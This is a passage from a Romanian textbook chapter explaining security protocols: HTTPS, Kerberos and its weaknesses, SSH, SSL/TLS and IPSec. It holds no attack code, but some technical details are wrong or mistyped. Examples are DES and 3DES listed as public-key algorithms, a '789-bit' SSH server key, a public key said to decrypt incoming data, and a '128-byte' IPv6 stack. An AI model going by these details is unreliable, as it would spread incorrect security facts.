transferului de informație criptată prin intermediul WWW, care a fost dezvoltat de Netscape
Communications pentru browserul Netscape Navigator în 1994 din necesitatea de a proteja de
intruşi transferul datelor prin HTTP. HTTPS nu este altceva decât HTTP „încapsulat” cu ajutorul
unui flux SSL/TLS - datele sunt criptate la server înainte de a fi trimise clientului. Pe scurt,
HTTPS = HTTP + SSL.
HTTPS este în acelaşi timp o metodă de autentificare a server-ului web care îl foloseşte, prin
intermediul „certificatelor digitale” - dacă certificatul este emis de o autoritate cunoscută, browser-
ul poate fi sigur că server-ul cu care comunică este ceea ce pretinde a fi.
Adresa URL HTTPS implicită utilizează portul TCP 443 (HTTP neprotejat utilizează portul
80). Pentru a pregăti un server web să manipuleze conexiunile https, administratorul trebuie să
obțină și să instaleze un certificat de cheie publică pentru acest server. TLS utilizează atât o schemă
de criptare asimetrică (pentru generarea unei chei secrete partajate), cât și o metodă simetrică
(pentru schimbul de date, criptată cu o cheie partajată). Certificatul de cheie publică confirmă faptul
că această cheie publică aparține proprietarului site-ului. Certificatul de cheie publică și cheia
publică în sine sunt trimise clientului la stabilirea unei conexiuni; cheia privată este utilizată pentru
a decripta mesajele de la client.
Este posibilă crearea unui astfel de certificat fără contactarea autorității de certificare. Aceste
certificate sunt semnate de ele însăși și se numesc auto-semnate (self-signed), însă fără a verifica
certificatul în alt mod (cum ar fi un apel către proprietar și verificarea sumelor de control ale
certificatului), o astfel de utilizare a HTTPS este supusă unui atac man-in-the-middle. Aproape toate
certificatele însă sunt verificate de o terță parte, astfel încât clienții să fie asigurați că cheia este
întotdeauna securizată.
HTTPS poate fi, de asemenea, utilizat pentru a autentifica clientul în scopul de a oferi acces
la server numai utilizatorilor autorizați. Pentru a face acest lucru, administratorul creează de obicei
certificate pentru fiecare utilizator și le încarcă în browser-ul fiecăruia din ei. Vor fi acceptate de
asemenea toate certificatele semnate de către organizațiile de încredere a serverului. Un astfel de
certificat conține de obicei numele și adresa de e-mail a utilizatorului autorizat, care sunt verificate
la fiecare conexiune pentru a verifica identitatea utilizatorului fără a introduce o parolă.

5
În HTTPS, lungimea cheii este de 40, 56, 128 sau 256 de biți pentru criptare. Unele versiuni
mai vechi ale browserelor utilizează lungimea cheii de 40 de biți (de exemplu versiunile IE de până
la 4.0), care se datorează restricțiilor de export în SUA, însă această lungime a cheii nu mai este
sigură. Multe site-uri moderne necesită utilizarea browserelor de noi versiuni, care susțin criptarea
cu o cheie de lungime de 128 de biți, pentru a asigura un nivel adecvat de securitate. Această
criptare face pentru un atacator foarte dificilă căutarea parolelor și a altor informații personale.
În mod tradițional, un singur site HTTPS poate funcționa pe o singură adresă IP. Pentru a
opera mai multe site-uri HTTPS cu certificate diferite, este utilizată o extensie TLS denumită Server
Name Indication (SNI).
Schema generală de funcționare a HTTPS constă în următoarele:
 atunci când se utilizează o conexiune https, serverul răspunde la conexiunea inițială,
oferind o listă de metode de criptare acceptate de serverul web;
 ca răspuns, clientul selectează o metodă de conectare;
 clientul și serverul fac schimb de certificate pentru a-și autentifica identitatea;
 atât serverul web, cât și clientul fac schimb de informațiile criptate după ce se
asigură că ambele utilizează aceeași cheie și conexiunea este închisă.

12.1.5. KERBEROS
Protocolul Kerberos a fost proiectat la Massachusetts Institute of Technology (MIT), în jurul
anului 1984 pentru a proteja serviciile de reţea oferite de proiectul Athena. Scopul protocolului
Kerberos era să extindă noţiunea de autentificare, autorizare şi contabilizare a mediului MIT.
Kerberos a fost proiectat pe baza modelului client-server și asigură autentificarea mutuală,
adică atât utilizatorul cât și serverul se autentifică unul față de celălalt. În terminologia Kerberos, un
domeniu administrativ se numeşte realm. Se presupune că orice companie sau organizaţie care
doreşte să ruleze Kerberos poate crea un realm identificat unic printr-un nume. Teoretic, Kerberos
poate suporta mai bine de 100.000 de utilizatori. El se bazează pe modelul client/server, iar
protocolul în sine constă dintr-un schimb de mesaje între un client şi o serie de servere, fiecare cu o
altă misiune.
Utilizatorii, clienţii şi serviciile de reţea instanţiate pe un host în particular se consideră în
mod tipic parteneri. Fiecare partener este identificat în mod unic de un identificator de partener,
care are în componenţă trei câmpuri, fiecare fiind un şir terminat cu null de până la 40 de caractere.
Aceste trei câmpuri sunt:
 numele partenerului, NAME;
 numele instanţei, INSTANCE;
 numele realm-ului, REALM.

6
Mesajele protocolului Kerberos sunt protejate împotriva atacurilor de ascultare
(eavesdropping) și de reluare a mesajelor (replay), scopul sistemului Kerberos fiind acela de a
permite unui client ce rulează în numele unui utilizator anume să se identifice unui serviciu sau unui
server de aplicaţii corespunzător, fără a se necesita trimiterea unor date secrete care ulterior să poată
fi folosite de un atacator la personificarea utilizatorului. Pentru a realiza acest lucru, modelul
Kerberos necesită existenţa unui terţ de încredere care serveşte ca centru de distribuţie a cheilor
(KDC) în realm-ul Kerberos. Kerberos utilizează tehnici simetrice de criptare și oferă un sistem de
mesaje criptate numite bilete (tickets), care asigură în mod securizat încrederea reciprocă dintre
două entități din rețea. Utilizând Kerberos, parolele nu mai sunt transmise prin rețea, nici măcar
criptate. În cazul în care un bilet Kerberos este interceptat acesta rămâne protejat deoarece este
criptat cu algoritmi robuști de criptare. Odată ce o entitate-client obține un bilet către un anume
server, biletul este păstrat pe calculatorul local până la expirare, făcând astfel din Kerberos un
sistem de autentificare foarte eficient. Depinde de implementare, dar în mod uzual un bilet Kerberos
expiră după opt ore. Fiecare entitate din rețea, fie client, fie server, deține o cheie secretă, cunoscută
doar de ea și de KDC. Această cheie constituie dovada identității unei entități. Pentru o comunicare
sigură între două entități din rețeaua publică, KDC generează o cheie a sesiunii. Pentru
implementarea protocolului Kerberos trebuie acordată o atenție deosebită stocării parolelor fiecărui
client, motiv pentru care serverul central trebuie să fie o maşină foarte sigură. KDC menţine o bază
de date cu informaţii despre fiecare partener din cadrul sistemului. Deoarece securitatea este foarte
importantă, această informaţie este redusă la un minim posibil pentru a efectua cu succes
autentificarea. Astfel, deşi baza de date Kerberos este la nivel de utilizator, aceasta nu conţine
informaţii cum ar fi numere de telefon sau adrese, neutilizate în mod curent la autentificare, ci
următoarele:
 identificatorul partenerului;
 cheia master Kp (sau parola dacă este utilizator);
 data expirării identităţii;
 data ultimei modificări a înregistrării;
 identitatea partenerului care a operat modificarea;
 timpul maxim de viaţă a biletelor emise partenerului;
 unele atribute;
 unele date interne de implementare invizibile la exterior cum ar fi versiunea cheilor,
versiunea cheii master sau indicatori către valori vechi ale înregistrării.
Cheia master (Kp) a fiecărui partener trebuie ţinută secretă, de aceea toate aceste chei
se codifică cu o cheie master a KDC. Pe lângă o protecţie sporită, această metodă permite

7
distribuirea bazei de date între servere fără riscul de a fi capturată de un potenţial atacator. Cheia
master KDC nu se păstrează în aceeaşi bază de date, ci se operează separat.
Un centru de distribuție a cheilor are două părți:
 un server de autentificare (Authentication Server - AS);
 un server de alocare a biletelor (Ticket Granting Server - TGS).
AS şi TGS sunt componente separate logic dar pot fi procese care rulează pe aceeaşi
maşină. Aceasta trebuie să fie protejată cu grijă şi securizată fizic, deoarece un intrus ar putea
compromite uşor întreg sistemul de la acest nivel. Un bilet este un certificat emis de KDC şi
criptat cu cheia master a serverului. Printre altele, un bilet conţine:
 cheia de sesiune care va fi utilizată pentru autentificarea între client şi server;
 numele partenerului către care cheia de sesiune a fost emisă;
 un timp de expirare după care cheia de sesiune nu mai este validă.
În procesul de funcționare a protocolului, sunt utilizate următoarele:
 serverul TGS (Ticket Granting Server) - oferă bilete de tip sesiune pentru accesarea altor
resurse. De obicei, TGS rulează în KDC;
 biletul TGT (Ticket Granting Ticket) reprezintă un jeton de validare a unui bilet Kerberos
care atestă faptul că o entitate a fost deja autentificată și ne asigură că utilizatorii nu mai
trebuie să reintroducă parola după un login inițial, până la expirarea biletului;
 biletul de sesiune ST (Session Ticket) reprezintă un jeton de sesiune care permite accesul la
resurse protejate. Pentru accesarea oricărei aplicații care utilizează Kerberos este necesar un
bilet de sesiune valid.
Pentru a realiza autentificarea protocolul Kerberos parcurge câteva etape:
1. Utilizatorul unui sistem client, utilizând un username și o parolă sau un smart card, se
autentifică față de server-ul de autentificare (AS din KDC). Clientul de login furnizează AS
numele, iar AS caută intrarea corespunzătoare utilizatorului în baza de date KDC.
2. Cu parola cerută de client utilizatorului se va cripta TGT. Dacă cheia derivată din parola
utilizatorului poate decripta cu succes TGT, acestuia i se permite accesul. Pe partea de
client, TGT-ul este memorat pentru folosire ulterioară şi anume pentru a obţine bilete pentru
autentificarea în servicii de reţea particulare. Scopul principal al TGT este deci să faciliteze
o singură autentificare pentru utilizatori. Parola este astfel cerută o singură dată, şi nu de
fiecare dată când se cere accesul la un serviciu.
3. Biletele sunt eliberate de TGS-ul specificat în TGT-ul primit de utilizator. Pentru a obţine un
bilet, clientul trimite o cerere către TGS.
4. Dacă TGS consideră atât biletul cât şi autentificatorul valid, biletul este returnat. Mesajul
include numele serviciului cerut, TGT-ul şi autentificatorul. Acesta din urmă este o

8
informaţie ce poate proba că a fost generată recent, utilizând cheia de sesiune de către client
şi server împreună. În particular, autentificatorul conţine numele utilizatorului, adresa de
reţea a clientului şi timpul curent, fiind criptat cu cheia de sesiune returnată în TGT.
Autentificatorul descurajează atacurile replay.
5. Clientul creează un alt autentificator şi îl trimite împreună cu biletul de serviciu serverului.
6. Dacă se cere autentificare reciprocă, serverul returnează un autentificator.
Aşa cum a fost menționat, modelul Kerberos nu oferă decât serviciul de autentificare. În
sine, el nu oferă informaţii despre autorizarea clientului în a folosi anumite servicii de reţea. În
general, sunt trei posibilităţi pentru atingerea problemei autorizării, şi anume:
 baza de date Kerberos ar putea conţine informaţii de autorizare pentru fiecare serviciu şi
să emită bilete doar utilizatorilor autorizaţi;
 un serviciu dedicat poate menţine informaţiile de autorizare prin liste de acces pentru
fiecare serviciu şi permiterea clientului să obţină certificate sigilate de apartenenţă la
listă; în acest caz clientul ar prezenta serviciului certificarea în locul biletului Kerberos;
 fiecare serviciu poate menţine propria informaţie de autorizare cu ajutorul opţional al
unui serviciu care stochează aceste liste de acces şi oferă certificări de apartenenţă la
listă.
Modelul Kerberos se bazează pe faptul că fiecare serviciu cunoaşte cu exactitate cine sunt
utilizatorii săi şi ce formă de autorizare este potrivită pentru aceştia. În consecinţă Kerberos
foloseşte cea de-a treia metodă. Pentru simplificarea implementării celei de a treia metode,
Kerberos foloseşte modelul de autorizare bazat pe liste de control al accesului. Orice serviciu care
consideră că i se potriveşte acest tip de autorizare poate încorpora o bibliotecă cu funcţii adecvate.
Utilizarea acestui model presupune că serviciul verifică dacă o identitate verificată aparţine unei
liste de acces.
Primele trei versiuni ale Kerberos au fost folosite doar în cadrul MIT, în prezent nemaifiind
folosite. Prima versiune făcută publică a fost Kerberos V4, versiune ce a cunoscut o răspândire
importantă în afara MIT. Deoarece unele medii necesitau funcţionalităţi neacoperite de Kerberos
V4, iar altele aveau o structură diferită de modelul MIT, în 1989 a început lucrul la Kerberos V5. În
septembrie 1993, Kerberos V5 a fost specificat ca standard Internet în RFC 1510. MIT a dezvoltat
şi testat Kerberos V5 pe Ultrix, SunOS, Solaris şi Linux, fiind portat şi pe alte sisteme de către terţi.
Deşi similare ca şi concept, Kerberos V4 şi V5 sunt substanţial diferite şi chiar sunt în competiţie
pentru dominaţia pe piaţă. Pe scurt, Kerberos V4 are o bază de instalare mai mare, este mai simplu
şi are o performanţă mai mare decât V5, însă lucrează doar cu adrese IP. Kerberos V5 pe de altă
parte, are o bază de instalare mai redusă, este mai complicat şi implicit mai puţin eficient, dar
prezintă mai multă funcţionalitate decât V4. În ciuda faptului că este disponibil codul sursă pentru

9
Kerberos V4 şi V5, MIT nu-l susţine oficial şi nu oferă suport. Unele companii însă oferă contra
cost versiuni comerciale de implementări Kerberos. Informaţii despre versiunile freeware şi
comerciale se găsesc în Kerberos FAQ publicat periodic în grupul de ştiri comp.protocols.kerberos.
Deşi Kerberos este foarte util şi mult folosit pentru autentificare, el are o serie de slăbiciuni:
 Kerberos este proiectat pentru autentificări utilizator-host şi nu host-host. Ca urmare,
folosirea acestui protocol de autentificare cere ca fiecare host să rețină cheile secrete
(master) KA ale tuturor celorlalte host-uri; însă se ştie că multe dintre ele reprezintă medii
foarte nesigure pentru memorarea pe termen lung a unor informații secrete. Dacă un intrus
ar fura o cheie primară, s-ar putea pretinde utilizator principal şi ar putea ataca orice server.
 O altă problemă este legată de bilet şi de cheia de sesiune. Din nou, calculatoarele multiuser
nu sunt bune pentru a păstra chei secrete în ele; oricine care poate citi o cheie de sesiune,
poate să o folosească pentru a se legitima drept o altă persoană. De asemenea, biletul poate
fi obținut prin ascultarea liniei şi, ca urmare, se pot obține accese la server-e fără drepturi
reale.
 Autentificatorii reprezintă şi ei o problemă vulnerabilă. Dacă host-ul nu ține o evidență a
autentificatorilor folosiți anterior, un intrus poate folosi un autentificator vechi, desigur însă
în limitele unor intervale de timp de expirare. De asemenea, se pot face anumite penetrări
făcând host-ul să aibă marcată o dată curentă mai veche.
 Cea mai importantă problemă o reprezintă modul în care se obține biletul inițial. Aceasta
deoarece cererea biletului pentru TGS nu conține în protocol nici un fel de informație de
autentificare, cum ar fi, de exemplu, numele cifrat al utilizatorului. Mesajul răspuns al lui
Kerberos este potrivit unui atac: un atacator situat la distanță în Internet poate să-şi
construiască o colecție de bilete cifrate şi poate să încerce un asalt cu ele. Ultima versiune a
protocolului Kerberos (v5) conține mecanisme pentru a preveni acest lucru.
 Kerberos nu rezolvă atacurile de tip “ghicire a parolei”. Dacă un utilizator a ales o parolă
simplă, atacatorul poate reuşi într-un atac de tipul celui cu dicționarul.
 Kerberos nu rezolvă problemele de atacuri la servicii. Astfel de protocoale sunt necesare
atunci când un intrus împiedică o aplicație să funcționeze în paşii de autentificare specificați.
Detectarea şi soluționarea unor astfel de atacuri – unele dintre lele părând a fi o defecțiune
obişnuită a sistemului – sunt lăsate în seama administratorului sau a utilizatorilor.

12.1.6. SSH
Secure Shell (SSH) este un protocol criptografic de rețea care permite ca datele să fie
transferate folosind un canal securizat între dispozitive dintr-o anumită rețea. Cele două mari
versiuni ale protocolului sunt SSH1 și SSH2. Protocolul SSH este folosit cu precădere în sistemele
de operare Linux, Unix și Windows. SSH a fost dezvoltat din dorința de a înlocui vechiul protocol
10
Telnet și al altor protocoale nesigure de acces de la distanță, care trimit informația, în special parola,
în text clar, făcând posibilă descoperirea ei prin analiza traficului. Criptarea folosita de SSH
intenționează să asigure confidențialitatea și integritatea datelor transmise printr-o rețea nesigură
cum este Internetul.
Scopul principal al protocolului SSH este de a îmbunătăți securitatea în rețea, încearcând să
facă acest lucru prin securizarea canalului prin care sunt transmise informațiile între participanți.
Pentru a asigura confidențialitatea și integritatea informațiilor interschimbate, SSH se folosește de
criptarea cu chei asimetrice. Utilizatorul deține o pereche de chei: una publică și una privată. În
timp ce cheia publică se trimite stației de la distanță cu care se dorește comunicarea, cea privată
rămâne tot timpul pe stația locală și trebuie protejată de public. Cheia publică trebuie trimisă stației
de la distanță pentru ca aceasta să o poată folosi la decriptarea datelor primite în format securizat.

Figura 12.1. Organizarea protocolului SSH


Protocolul SSH este format din trei componente majore (figura 12.1): Transport Layer –
protocol care prevede autentificarea serverului, confidențialitatea și integritatea perfectă a
secretului. La nivelul acestui strat, dacă utilizatorul are o cheie care a fost compromisă din diverse
motive aceasta nu afectează securizarea sesiunilor anterioare. User Authentication – protocol care
autentifică clientul care dorește să folosească tunelul în conexiunea cu serverul. Connection
Protocol – acest protocol multiplexează tunelul criptat în mai multe canale logice. Aceste canale
sunt deasupra conexiunii SSH.
Comunicarea dintre client și server folosind protocolul SSH se realizează parcurgând câțiva
pași:
1. primul pas constă în autentificarea clientului spre server. Întotdeauna clientul este cel
care inițiază conexiunea; După ce serverul este autentificat, iar clientul este sigur de

11
identitatea serverului, se formează un canal securizat simetric între client și server care
va fi utilizat pentru schimbul de chei, parole și alte lucruri;
2. se realizează conexiunea TCP spre portul 22 ( port oficial asignat protocolului SSH); la
acest pas clientul obține informații referitoare la versiunea protocolului suportată de
server și versiunea protocolului SSH; în cazul în care clientul nu suportă versiunea SSH
a serverului conexiunea va înceta;
3. după decizia clientului de a continua conexiunea se trece la Protocolul Binary Pacher,
protocol care conține un pachet cu o lungime de 32 biți;
4. la pasul următor serverul preia inițiativa și trimite clientului identitatea sa, sub forma
unei chei publice; această cheie este creată în timpul instalară serverului openssh.
5. în cazul în care clientul realizează pentru prima dată conexiunea cu serverul respectiv,
acesta va fi informat printr-un mesaj de avertizare despre identitatea serverului (unele
programe permit înregistrarea acestei identității în memoria chase);
6. clientul mai primește o informație referitoare la cheia serverului; această cheie este
regenerată la fiecare oră; dimensiunea standard a cheii este de 789 biți;
7. clientul trimite un răspuns serverului prin procedeul denumit checkbytes 8 biți, iar la
final serverul furnizează clientului informațiile despre metoda de criptare și informațiile
despre autentificare;
8. în funcție de lista cu algoritmi de criptate suportată de server, clientul va crea o cheie
simetrică pe care o va trimite serverului; aceasta cheie simetrică va fi folosită pentru
procesul de criptare și decriptare a datelor trimise prin canal în timpul sesiunii; tot la
acest pas clientul va executa o dublă criptare; prima criptare este realizată de serverul
gazdă iar a doua criptare este executată de cheia serverului, astfel se asigură nivelul de
securitate optim, deoarece în cazul în care cheia de la serverul host este compromisă
mesajul tot nu va putea fi descifrat fiind păstrat în siguranță de a doua criptare;
9. după dezvăluirea identității serverului către client, a venit momentul ca clientul să se
autentifice pe server; după ce clientul trimite cheia dublă criptată va așteaptă mesajul de
confirmare venit din partea serverului, mesaj care confirmă faptul că serverul este
capabil să decripteze informațiile primite de la client;
10. autentificarea clientului este realizată într-un canal criptat; există mai multe metode care
pot fi utilizate de client în vederea autentificării: cheia publică, parola sau rhosts:
a. cheia publică – aceasta este considerată de protocolul SSH cea mai puternică
metodă de autentificare; se creează o cheie publică și se trimite spre server; după
recepționarea serverului a cheii publice generate de către client va genera un șir
de 256 de biți pe care îl va trimite clientului; clientul se va folosi de cheia privată

12
pentru a decripta șirul trimis de server iar apoi va genera o valoare hash md5 pe
care o va trimite serverului; dacă server-ul va decripta valoarea trimisă de client
autentificarea este realizată cu succes;
b. parola – este cea mai folosită metodă de autentificare în protocolul SSH; clientul
trimite serverului o parola (care este criptată cu ajutorul cheii simetrice), iar dacă
mecanismul de autentificare al serverului recunoaște parola, clientului îi este
aprobat accesul conexiunii;
c. rhosts – această metodă este recomandată dacă se dorește „trecerea cu vederea”
verificarea parolei; se utilizează fișierul /.ssh/hnown_hosts pentru autentificarea
serverului și fișierul /.rhosts pentru autentificarea clientului; în cazul setării
prealabile a acestor fișiere se elimină în bună măsură furnizarea parolei în mod
interactiv.

12.2. Protocoale la Nivelul Transport


În acest compartiment vom analiza protocoalele TLS și SSL care, de fapt, nu se potrivesc
perfect niciunui nivel al modelului OSI sau al modelului TCP/IP. Ele rulează „deasupra” unui
anumit protocol de transport fiabil (de ex. TCP), ceea ce ar însemna că acesta se află deasupra
nivelului Transport. Aceste protocoale servesc pentru criptare în nivelurile superioare, ceea ce este,
în mod normal, funcția nivelului Prezentare. Cu toate acestea, aplicațiile folosesc în general TLS ca
și cum ar fi un nivel Transport, chiar dacă aplicațiile care utilizează TLS trebuie să controleze în
mod activ inițierea de „strângere de mână” TLS și manipularea certificatelor de autentificare
schimbate.
SSL (Secure Sockets Layer) este un acronim care reprezintă un protocol criptografic
dezvoltat de compania Netscape pentru a realiza conexiuni protejate în rețelele de calculatoare.
Câteva versiuni ale protocoalelor își găsesc aplicații pe scară largă în navigarea pe Internet, e-mail,
fax prin Internet, mesagerie instantanee și voce-over-IP (VoIP). Site-urile web pot utiliza TLS
pentru a asigura toate comunicările dintre serverele lor și browserele web.
Pentru a cripta datele, SSL utilizează un sistem criptografic cu două chei: una publică și una
privată. Au fost oferite mai multe actualizări ale prezentului protocol, astăzi versiunea cea mai nouă
fiind SSL 3.0, devenită la timpul ei standard. Versiunea 3.0 este suportată de majoritatea serverelor
web, însă începând cu anul 2014, această versiune a SSL este considerată nesigură deoarece este
vulnerabilă la atacul POODLE care afectează toate cipurile pe blocuri din SSL. Chiar și RC4,
singurul cifru non-block suportat de SSL 3.0, este, de asemenea, posibil de spart. SSL 3.0 a fost
interzis oficial începând cu luna iunie 2015.
TLS (Transport Layer Security) este succesorul protocolului SSL. Chiar dacă există anumite
diferențe între TLS și SSL, protocoalele sunt foarte asemănătoare. Obiectivul protocolului TLS este
13
de a opri interceptarea “mesajului fals”, acesta oferind un pachet complect de securitate
criptografică între informațiile confidențiale transmise între servere. Două mari avantajele ale
protocolului TLS sunt independența și transparența.
Scopul principal al protocolului SSL/TLS este de a oferi intimitate și fiabilitate între două
aplicații care comunică între ele. SSL/TLS criptează datele cu caracter sensibil ale utilizatorului
atunci când sunt trimise spre un server web de-a lungul unei rețele nesigure. Protocolul SSL/TLS
este compus din două nivele. Primul nivel, denumit Handshake protocol (strângere de mână),
conține la rândul său alte trei subprotocoale: Handshake, Change Cipher Spec și Alert. Al doilea
nivel este definit de protocolul Record.
Mai jos urmează o descriere succintă a subprotocoalelor din Handshake protocol.
Handshake – este folosit pentru schimbul de informații inițiale dintre client și server.
Informațiile schimbate între client și server constă în ID-ul de sesiune, certificarea peer,
specificațiile cifrului, algoritmul de compresie utilizat și informația confidențială care este folosită
pentru a genera o cheie.
Change Cipher Spec – este folosit pentru a partaja informațiile criptate între client și server.
Acesta transmite informații în cealaltă parte a sesiunii SSL/TLS referitoare la modul de trimitere a
unui nou set de chei criptografice.
Alert – reprezintă mesaje de alertă care indică o schimbare a statutului sesiunii sau o stare de
eroare. Există o mare varietate de alerte care notifică clientul sau serverul web implicat în sesiunea
SSL/TLS despre modul și condițiile de funcționare. Alertele sunt trimise de obicei atunci când
conexiunea este închisă, nu este primit un anumit mesaj, sau nu poate fi decriptat un alt mesaj.
Protocolul Handshake folosește certificatul x509 pentru procesul de autentificare, certificat
care oferă „dovezi” despre identitatea părții care deține certificatul precum și despre cheia privată
corespunzătoare. Astfel de certificate digitale sunt eliberate de o autoritate de sine stătătoare.
Certificatele conțin perioada de valabilitate, cheia publică, semnătura digitală și numărul de serie
distinct. Autoritatea CA confirmă identitatea solicitantului, iar mai apoi îi emite acestuia certificatul
digital solicitat. De asemenea autoritatea poate reînnoi sau revoca un anumit certificat digital.
Protocolul SSL/TLS folosește două tipuri distincte de criptări: cu cheie secretă și cu cheie
publică. Cheia secretă se folosește în cazul criptării unor cantități mari de date, deoarece criptarea și
decriptarea este mult mai rapidă față de criptarea cu cheie publică. Cheia publică este folosită pentru
criptarea unei cantități mici de date, de exemplu – a cheii private.
Protocolul record (protocol de înregistrare) primește și criptează toate datele provenite din
nivelul Aplicație și îl pregătește pentru expedierea în următorul nivel (nivelul Transport). Datele
sunt prelucrate, iar mai apoi fragmentate în dimensiuni apropiate algoritmului de criptare, li se

14
atribuie adresa unică MAC, iar mai apoi sunt criptate (sau decriptate) folosind informațiile care au
fost negociate în timpul protocolului Handshake.

Figura 12.2. Organizarea protocolului SSL/TLS


Organizarea interna a protocolului TLS/SSL și modul de funcționare al acestuia este
prezentată în figura 12.2.
Comunicarea dintre client și server folosind protocolul SSL/TLS. Protocolul SSL permite
schimbul de înregistrări; fiecare înregistrare poate fi, în mod opțional, compresată, criptată și
asignată cu un cod de autentificare al mesajului (MAC). Fiecare înregistrare are un câmp numit
content_type care specifică care protocol este folosit. Când conexiunea demarează, nivelul
înregistrare încapsulează un alt protocol, de tip handshake protocol, pentru care câmpul
content_type are valoarea 22.

Figura 12.3. Comunicarea dintre client și server cu ajutorul protocolului SSL/TLS

Clientul trimite și primește mai multe structuri de handshake (figura 12.3):

15
 trimite un mesaj ClientHello în care specifică lista de metode de criptare care sunt
suportate, metodele de compresie și cea mai actuală versiune a protocolului cunoscută;
de asemenea transmite o secvență aleatoare de biți care va fi folosită ulterior;
 primește mai apoi un ServerHello, în care serverul alege parametrii conexiunii din
mulțimea de opțiuni oferită de client mai devreme;
 când parametrii conexiunii sunt cunoscuți, clientul și serverul schimbă certificatele (în
funcție de algoritmul de codare ales pentru chei publice); aceste certificate sunt în
prezent de tip X.509, dar există de asemenea un document care specifică utilizarea
certificatelor bazate pe OpenPGP;
 Serverul poate solicita un certificat clientului, astfel încât conexiunea să fie mutual
autentificată;
 clientul și serverul negociază un secret comun numit “master secret”, existând aici
opțiunea folosirii rezultatului schimbului Diffie-Hellman sau, mai simplu, prin criptarea
secretului cu cheia publică a partenerului și decriptarea acesteia cu cheia privată
respectivă; toate datele legate de chei sunt derivate din acest “master secret” (și din
valori generate aleator de către client sau de către server utilizând “funcții
pseudoaleatore”).
TLS/SSL au o varietate de măsuri de securitate:
 numerotarea tuturor înregistrărilor cu numere de secvență în MAC-uri;
 folosirea unui mecanism de sumarizare a mesajului extins prin folosirea unei chei
(pentru ca numai dacă se cunoaște cheia să poți verifica MAC; acest lucru este specificat
în RFC 2104);
 protecție împotriva unor tipuri cunoscute de atacuri (incluzând atacuri de tip “man-in-the
middle”), precum cele de tip forțare la folosirea a unor versiuni mai vechi (și mai puțin
sigure) ale protocolului, sau versiuni mai puțin sigure ale algoritmilor de codare;
 mesajul care încheie handshake (“Finished”) care trimite un hash tuturor datelor
schimbate între cele două părți;
 funcțiile pseudoaleatore împart datele în două jumătăți și le procesează cu doi algoritmi
diferiți de hash (MD5 și SHA), și apoi se face un XOR între ele; în acest fel se
protejează și de cazurile în care pentru unul dintre acești doi algoritmi se găsește o
vulnerabilitate;
Versiunea curentă a protocolului este TLS 1.2, însă este în proces de finisare o nouă
versiune - TLS 1.3.
În versiunea curentă a protocolului sunt disponibili următorii algoritmi:

16
 pentru schimbul cheilor și verificarea autenticității acestora, se utilizează combinații de
algoritmi: RSA, Diffie-Hellman, DSA, ECDSA;
 pentru criptare simetrică: RC4, IDEA, Triple DES, SEED, Camellia sau AES;
 pentru funcțiile hash: MD5, SHA, SHA-256/384.
Algoritmii pot fi suplimentați în funcție de versiunea protocolului. Până la versiunea TLS
1.2 au fost de asemenea disponibili algoritmii de criptare simetrică RC2, IDEA, DES, însă ei au fost
eliminați ca fiind nesiguri.

12.3. Protocoale la Nivelul Rețea

12.3.1 IPSec
IPSec (Internet Protocol Security) este o suită de protocoale pentru securizarea
comunicațiilor peste stiva TCP/IP. Această suită se bazează pe folosirea funcțiilor matematice și a
algoritmilor de criptare și autentificare pentru a asigura confidențialitatea, integritatea și non-
repudierea informațiilor din fiecare pachet IP transmis pe rețea. IPSec este la ora actuală una dintre
cele mai folosite metode de securizare a transmisiei pe Internet, alături de SSL și TLS. Spre
deosebire de acestea, protocoalele IPSec se regăsesc la nivelul 3 al stivei TCP/IP și la nivelul 3 al
stivei ISO-OSI, ceea ce face posibilă securizarea tuturor aplicațiilor care folosesc stiva TCP/IP.
IPSec are o arhitectură de tip end-to-end, compatibilă atât cu stiva IPv4, cât și cu IPv6, unde
integrarea funcțiilor de securizare este nativă, încă de la proiectarea stivei pe 128 de octeți.
Un router sau un server pe care sunt activate protocoalele de securitate IPsec se numește
poartă de securitate (securițy gateway) sau paravan de protecție (firewall). În general, asigurarea
securității unei transmisii se realizează la ambele capete ale căii de comunicație, cu două
echipamente care folosesc IPSec lucrând în pereche (IPsec peers). Prin suita IPSec pot fi securizate
comunicațiile între două sau mai multe calculatoare independente, între două sau mai multe
subrețele aflate fiecare în spatele unui gateway care se ocupă de folosirea funcțiilor criptografice
pentru fiecare subrețea aflată în administrarea sa, precum și între un calculator independent și o
subrețea aflată în spatele unui gateway. IPSec se bazează pe proprietățile criptografice ale unor
modele precum Diffie-Hellman, RSA sau DSA și a algoritmilor de criptare și autentificare, cum
sunt 3DES, AES, SHA1, SHA2.
IPsec oferă următoarele servicii de securitate pe nivelul IP al rețelelor TCP/IP:
 integritatea conexiunii - asigură faptul că în procesul de comunicație nu intervin entități
neautorizate care să modifice datele sau să genereze mesaje false în rețea;
 autentificarea sursei de date - permite identificarea sursei și asigurarea autenticității
mesajelor;
 criptarea datelor - asigură confidențialitatea mesajelor transmise și imposibilitatea preluării
neautorizate a informațiilor;
17
 protecția la atacuri în rețea - detectează pachetele repetitive, replici ale aceluiași pachet,
care se transmit la infinit în rețea și pot produce blocaje sau saturarea rețelei (flooding).
În cadrul IPsec autentificarea sursei se face pe baza protocolului AH (Authentication
Header) din suita IPsec (RFC 2401, RFC 2402). Acest protocol asigură autenticitatea mesajelor și a
tuturor informațiilor adiționale incluse în pachet precum și integritatea pachetului de date, prin
aplicarea funcților hash. AH împiedică modificarea ilegală a pachetelor, multiplicarea sau
întârzierea datelor (antireplay security). Pe lângă protocolul AH, există și protocolul ESP
(Encapsulating Security Payload) care asigură autenticitatea, integritatea și confidențialitatea
pachetelor de date. Spre deosebire de protocolul AH, antetul pachetului IP nu este protejat de ESP,
acesta oferind servicii de securitate numai protocoalelor de pe nivelele superioare.
Confidențialitatea datelor este asigurată prin criptare. Protocoalele AH și ESP pot fi implementate
prin diverși algoritmi software și se pot aplica fie individual, fie simultan, în funcție de gradul de
securitate impus pachetelor IP (RFC 2403, RFC 2404). Stabilirea protocoalelor poate avea loc static
sau dinamic. Denumirea oficială a stabilirii statice este manual keying. Metoda dinamică de stabilire
a asocierilor de algoritmi și chei este numită ISAKMP (Internet Security Association and Key
Management Protocol), descrisă în RFC 2408. Pe baza mecanismului ISAKMP/TKE se generează
și se transmit între părți cheile de criptare utilizate de SA (Security Association) în diferite sesiuni,
memorate într-o bază de date proprie ISAKMP ca atribute ale SA. În rețelele TCP/IP, se utilizează
diverși algoritmi de criptare, uzuali fiind cei cu cheie publică (RSA, Diffie-Hellman, DES, 3DES
etc). Există două versiuni ale ISAKMP, IKEv1 și IKEv2 - Internet Key Exchange.
În funcție de tipul de încapsulare al traficului supus IPSec, suita poate realiza securizarea
prin încapsulare de tip tunel sau de tip transport.
